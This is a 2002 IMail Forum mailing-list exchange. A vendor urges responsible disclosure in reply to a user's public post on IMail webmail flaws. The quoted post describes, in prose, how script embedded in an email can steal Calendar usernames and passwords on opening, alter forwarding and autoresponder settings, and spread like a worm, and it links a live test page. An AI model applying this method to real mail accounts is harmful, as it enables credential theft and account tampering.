RE: [IMail Forum] Problem With Calendaring

[Ron Hornbaker]

Norman,   About 3,000 anonymous people subscribe to this list. It would probably be best to notify the software manufacturers first, and give them a reasonable period of time to respond/patch before you describe cracking methods in a public forum. Just my biased $0.02 as a software manufacturer. :) Ron Hornbaker  - http://humankindsystems.com - 2,603 admins can't be wrong  - http://AnswerTrack.com - eCRM email tracking & routing  - http://KillerWebMail.com - the name says it all  - 1-888-952-4888 or [EMAIL PROTECTED] -----Original Message----- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]On Behalf Of Norman J. Nolasco Sent: Tuesday, March 19, 2002 4:49 PM To: [EMAIL PROTECTED] Subject: [IMail Forum] Problem With Calendaring <disclaimer>If anyone thinks I should NOT be posting these weeknesses in this Forum, speak up and I'll stop.  I'm just thinking that you might want to be aware about this stuff before it hits you.</disclaimer>   There is a way to use the aforementioned embedded javascript thing to obtain the username and password for any iMail Calendar users WITHOUT redirecting them to another login screen.  I haven't tested this on the default templates, just KWM.  But this is definitely an iMail issue with the way they handle security.  Just opening the mail gets their username and password.   This is related to the fact that Calendaring has to run on a different port.  The security context is transferred to the "new server" insecurely.   There is another way to do "humorous" things like change the forwarding address, vacation settings, and the autoresponder for default template users (have not tested this on KWM).  The classic worm virus model can also be implemented by opening up the contacts pages with the same methods (I'm not touching that one, I have a preference for freedom).   Test page is at: http://209.16.59.28/test.asp   I'm taking it down if IPSwitch or any of the regulars here tell me to.  Personally, I'm just going to load the messages from a different server, filter out HTML, display it in a frame, and shut off web calendaring.   Thanks, Norm